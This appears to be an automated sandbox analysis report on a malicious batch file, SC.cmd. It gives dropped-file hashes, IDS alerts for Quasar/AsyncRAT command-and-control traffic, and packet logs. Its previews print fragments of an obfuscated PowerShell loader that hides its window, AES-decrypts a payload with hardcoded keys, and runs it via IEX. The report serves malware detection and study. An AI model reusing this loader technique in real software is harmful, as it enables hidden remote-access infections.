                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):81920
                                                                Entropy (8bit):6.192811053319244
                                                                Encrypted:false
                                                                SSDEEP:1536:DayE7ffgaxRF71ry9vmt486MypQKURDoq4OZZZLlCIibz:Y3ganFp4NpqRD68wbz
                                                                MD5:D25A9E160E3B74EF2242023726F15416
                                                                SHA1:27A9BB9D7628D442F9B5CF47711C906E3315755B
                                                                SHA-256:7B0334C329E40A542681BCAFF610AE58ADA8B1F77FF6477734C1B8B9A951EF4C
                                                                SHA-512:BAFAEE786C90C96A2F76D4BBCDDBBF397A1AFD82D55999081727900F3C2DE8D2EBA6B77D25C622DE0C1E91C54259116BC37BC9F29471D1B387F78AAA4D276910
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: 2.cmd, Detection: malicious, Browse
                                                                • Filename: yhDRFwEXdd.cmd, Detection: malicious, Browse
                                                                • Filename: EvzLqMb67R.js, Detection: malicious, Browse
                                                                • Filename: NEW_DESIGN_SPECIFICATION_SAMPLE_DRAWINGS.cmd, Detection: malicious, Browse
                                                                • Filename: SC.cmd, Detection: malicious, Browse
                                                                • Filename: bin.ps1, Detection: malicious, Browse
                                                                • Filename: z2InvoiceConfirmation3.bat, Detection: malicious, Browse
                                                                • Filename: z16INVOICE07.bat, Detection: malicious, Browse
                                                                • Filename: myxwr5cli.bat, Detection: malicious, Browse
                                                                • Filename: Attachments.zip, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.u./.../.../...&...?...;.......;...,...;...=...;...>.../...F...;...-...;......;.......Rich/...................PE..d...;kyF..........".................P..........@....................................8.....`.......... ......................................X...........`o...... ............p..`.......T............................................................................text...m........................... ..`.rdata...$.......&..................@..@.data...............................@....pdata.. ...........................@..@.rsrc...`o.......p..................@..@.reloc..`....p.......>..............@..B................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):105984
                                                                Entropy (8bit):5.943521586025223
                                                                Encrypted:false
                                                                SSDEEP:3072:Ih4bKIaR4QhlUKfZq1T5cL14vVlg5dLZUzkKb:B+I7klUKfIj0KwK
                                                                MD5:D4F7FF46BB9412B90E8F091F6A9115C3
                                                                SHA1:E7C82ECA0BD2C9969B036EFD07BFB6A1E3A342CD
                                                                SHA-256:53493EDDDF3E4509F791D0E26EA80D8B2283AA95A0F4E263EBB8FC1E7D8D9C82
                                                                SHA-512:7BF7A9424F8540D4F867C53C3042FC91C7C4BF09F8C790D664908C61CCE3D32A16FA286FFF2D5B9AED3C25F645FDBA50A2C91030EEA9DA1E8E7215C414E32A0D
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:.C.TMC.TMC.TM..WLF.TM..QL.TM..PLI.TM..WLJ.TM..PLM.TM..QLc.TM..ULF.TMC.UM..TMP.]LA.TMP..MB.TMP.VLB.TMRichC.TM................PE..d...rx.f.........." ...(..................................................................`.................................................t...<...............................P....i..p...........................Ph..@...............p............................text...@........................... ..`.rdata..............................@..@.data...P............x..............@....pdata..............................@..@.rsrc...............................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\svchost.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):55
                                                                Entropy (8bit):4.306461250274409
                                                                Encrypted:false
                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                Malicious:false
                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with very long lines (2195), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):2197
                                                                Entropy (8bit):5.609261768983518
                                                                Encrypted:false
                                                                SSDEEP:48:QIJRm8RUYRxSKB31AqjB3d2zDpOXkHvMoZqgzbhdHNvj4O4Qmm1BFzOIoOWYxWwc:JBN7PB/jBIVUloHD4Qmm0IVzx97PDc
                                                                MD5:3E37EB46F0A9AA173AB6AECAF7BD6C76
                                                                SHA1:294B03AEAF30AC84014A741EFAFF832D5CF9AD88
                                                                SHA-256:99B2CBCC20BC0B15A9F93B21FFEE60ACF5A297AAAE020C6F3339E94106C15AD3
                                                                SHA-512:231A3A01A245C088EEA89ADFD15C81964DDB14E738AD16F3E1CC79D4E2723284B977A32390D22B17ED849778C6873DE3B552906707CADF18AB0F4DCEF620B982
                                                                Malicious:false
                                                                Preview:cls;powershell -w hidden;function decrypt_function($param_var){.$aes_var=[System.Security.Cryptography.Aes]::Create();.$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$aes_var.Key=[System.Convert]::FromBase64String('t/6WxGFiWqzOYDiMeQW3vewy5Lst4QLmvh7FIz66oK8=');.$aes_var.IV=[System.Convert]::FromBase64String('1xTnhp7Ji3XlXldEQfx/mg==');.$decryptor_var=$aes_var.CreateDecryptor();.$return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);.$decryptor_var.Dispose();.$aes_var.Dispose();.$return_var;}function decompress_function($param_var){.IEX '$bNhXj=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', '');.IEX '$FyATo=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', '');.IEX '$ElTgO=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($bNhXj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', '');.$ElTgO.CopyTo($FyATo);.$ElTg
                                                                File type:ASCII text, with very long lines (57316), with CRLF line terminators
                                                                Entropy (8bit):6.008561560748652
                                                                TrID:
                                                                  File name:SC.cmd
                                                                  File size:1'962'270 bytes
                                                                  MD5:df146ae56b040ce90f1c879a8282a03e
                                                                  SHA1:2e6024ad1883b72057dbaf5eaa2ea84656a443cf
                                                                  SHA256:1e0819a321e43f692e6f2bb08c153ac62b2ae2cbbfb3a1ac7806d55ca3b54df9
                                                                  SHA512:fbec78d95389a2649b86ab8d452af51ab5414e73b5e371838d8e11e85f49573d2452eb97d6790b2bcdb32d9015e30e2396d9570c962c45eeed67351df622ea08
                                                                  SSDEEP:24576:TKLGeNfzqE3gY/noO0Bq8JvRMiUOCYUsQJQTUVXLbsPYmgaF+qbAmMNN0DCDYEpE:b2dGqkqgv+uS6B5R
                                                                  TLSH:529533546FE13FDD1998CA1ED2A3A45F4362DAA32DFEB0E8A6442CCF17BD5424930C19
                                                                  File Content Preview:title hdsgsdgsdgssd :dsgdsgh3..title hdsgsdgsdgssd :3qghghw3ygwe..set "mKOF=Lo"..set "rBpV=nvo"..set "pFKF=lect"..set "xWpl=byp"..set "XzpL=prof"..set "gjattCHlpfMJWyeIyYqV=echo cls;powershell "..set "HUiktjTsSMbhkrAdJvmO=-w hidden;function d"..set "UeFjT
                                                                  Icon Hash:9686878b929a9886
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-10-03T14:52:38.632066+02002027619ET MALWARE Observed Malicious SSL Cert (Quasar CnC)1154.216.20.1327000192.168.2.449736TCP
                                                                  2024-10-03T14:52:38.632066+02002035595ET MALWARE Generic AsyncRAT Style SSL Cert1154.216.20.1327000192.168.2.449736TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 3, 2024 14:52:37.831473112 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:52:37.836481094 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:52:37.836594105 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:52:37.846776009 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:52:37.851712942 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:52:38.622430086 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:52:38.623064041 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:52:38.623080969 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:52:38.623120070 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:52:38.623147011 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:52:38.627270937 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:52:38.632066011 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:52:38.837004900 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:52:39.012576103 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:52:39.673525095 CEST49742443192.168.2.4195.201.57.90
                                                                  Oct 3, 2024 14:52:39.673578978 CEST44349742195.201.57.90192.168.2.4
                                                                  Oct 3, 2024 14:52:39.673648119 CEST49742443192.168.2.4195.201.57.90
                                                                  Oct 3, 2024 14:52:39.674954891 CEST49742443192.168.2.4195.201.57.90
                                                                  Oct 3, 2024 14:52:39.674968958 CEST44349742195.201.57.90192.168.2.4
                                                                  Oct 3, 2024 14:52:40.555192947 CEST44349742195.201.57.90192.168.2.4
                                                                  Oct 3, 2024 14:52:40.556148052 CEST49742443192.168.2.4195.201.57.90
                                                                  Oct 3, 2024 14:52:40.588880062 CEST49742443192.168.2.4195.201.57.90
                                                                  Oct 3, 2024 14:52:40.588907003 CEST44349742195.201.57.90192.168.2.4
                                                                  Oct 3, 2024 14:52:40.589232922 CEST44349742195.201.57.90192.168.2.4
                                                                  Oct 3, 2024 14:52:40.622237921 CEST49742443192.168.2.4195.201.57.90
                                                                  Oct 3, 2024 14:52:40.667402983 CEST44349742195.201.57.90192.168.2.4
                                                                  Oct 3, 2024 14:52:40.821695089 CEST44349742195.201.57.90192.168.2.4
                                                                  Oct 3, 2024 14:52:40.821791887 CEST44349742195.201.57.90192.168.2.4
                                                                  Oct 3, 2024 14:52:40.821845055 CEST49742443192.168.2.4195.201.57.90
                                                                  Oct 3, 2024 14:52:40.893322945 CEST49742443192.168.2.4195.201.57.90
                                                                  Oct 3, 2024 14:52:41.109379053 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:52:41.115480900 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:52:41.115523100 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:52:41.120259047 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:52:41.520436049 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:52:41.639473915 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:52:41.682550907 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:52:41.811887980 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:06.684499979 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:06.689515114 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:31.700166941 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:31.851917028 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:49.513940096 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:49.513963938 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:49.513986111 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:49.514005899 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:49.514028072 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:49.520200014 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:49.525007963 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:49.525055885 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:49.529905081 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.390626907 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.436646938 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:50.552103043 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.606901884 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:50.670041084 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:50.670169115 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:50.675137043 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.675142050 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.675205946 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.675209999 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.675215960 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.675231934 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.675242901 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.675251961 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:50.675283909 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.675288916 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.675292015 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.675338984 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:50.675362110 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:50.675376892 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.678874016 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:50.680159092 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.680325985 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.680329084 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.680332899 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.680346012 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.680352926 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.680388927 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.680401087 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.680409908 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.680449009 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:50.680457115 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.680511951 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.680577993 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:50.680655003 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:50.683648109 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.685353994 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.685359955 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.685564995 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.685643911 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.685697079 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.685760021 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.685764074 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.685794115 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.685853004 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.685956001 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.685960054 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.685965061 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.685973883 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.685977936 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.686001062 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.686005116 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.686007977 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.686069012 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:50.686079025 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:51.135603905 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:51.184627056 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:51.293070078 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:51.340842962 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:51.345706940 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:51.350521088 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:51.350588083 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:51.355380058 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:51.735301971 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:51.778335094 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:51.887269974 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:51.920278072 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:51.925326109 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:51.928343058 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:51.933162928 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:52.291197062 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:52.343261003 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:52.449301004 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:52.495117903 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:52.500165939 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:52.500418901 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:52.505237103 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:52.876950979 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:52.918926001 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:53.027498960 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:53.075196028 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:53.082159042 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:53.087018967 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:53.087065935 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:53.091943026 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:53.520068884 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:53.559551954 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:53.621817112 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:53.657108068 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:53.657108068 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:53.662136078 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:53.662164927 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:53.662344933 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:53.662354946 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:53.662365913 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:53.886879921 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:53.934559107 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:54.043021917 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:54.078104019 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:54.078193903 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:54.083199978 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:54.083205938 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:54.083219051 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:54.465667009 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:54.512819052 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:54.621361017 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:54.669878960 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:54.674340010 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:54.679121971 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:54.679187059 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:54.684001923 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:55.057058096 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:55.106419086 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:55.215379953 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:55.252527952 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:55.257428885 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:55.257478952 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:55.262326956 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:55.634809017 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:55.684570074 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:55.793140888 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:55.840851068 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:55.844158888 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:55.849004030 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:55.849116087 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:55.854085922 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:56.235728025 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:56.294677019 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:56.386790991 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:56.422895908 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:56.427761078 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:56.430486917 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:56.435348988 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:56.819633961 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:56.872054100 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:56.980524063 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:57.028311014 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:57.033982038 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:57.040924072 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:57.040982008 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:57.047617912 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:57.418158054 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:57.465794086 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:57.574502945 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:57.617285967 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:57.618796110 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:57.623523951 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:57.623568058 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:57.628376961 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:57.995992899 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:58.043947935 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:58.152648926 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:58.188254118 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:58.193485975 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:58.193557024 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:58.198853970 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:58.576575994 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:58.624238968 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:58.730731010 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:58.777887106 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:58.782958984 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:58.783085108 CEST497367000192.168.2.4154.216.20.132
                                                                  Oct 3, 2024 14:53:58.787981987 CEST700049736154.216.20.132192.168.2.4
                                                                  Oct 3, 2024 14:53:59.155273914 CEST700049736154.216.20.132192.168.2.4
